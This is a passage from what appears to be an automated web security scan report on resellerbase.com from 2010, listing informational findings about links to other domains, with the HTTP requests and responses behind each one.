<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.75. http://www.resellerbase.com/communication/broadband/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.76. http://www.resellerbase.com/communication/broadband/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/broadband/googlepr.php?link_id=10

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/broadband/googlepr.php?link_id=10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.77. http://www.resellerbase.com/communication/broadband/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://worldkom.net/reseller
http://www.telebay.com/0815

Request

GET /communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:35:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.telebay.com/0815" name="link_10"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.telebay.com/0815" name="link_10"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://worldkom.net/reseller" name="link_16"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://worldkom.net/reseller" name="link_16"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.78. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.79. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.80. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.81. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.82. http://www.resellerbase.com/communication/broadband/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.83. http://www.resellerbase.com/communication/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/googlepr.php?link_id=10

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/googlepr.php?link_id=10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.84. http://www.resellerbase.com/communication/mobile-content/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.85. http://www.resellerbase.com/communication/mobile-content/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/mobile-content/googlepr.php?link_id=29

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/mobile-content/googlepr.php?link_id=29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.86. http://www.resellerbase.com/communication/mobile-content/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.mediaplazza.com/sysMaster.php?a=movil24

Request

GET /communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:37:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 20840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.87. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.88. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.89. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.90. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.91. http://www.resellerbase.com/communication/mobile-content/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
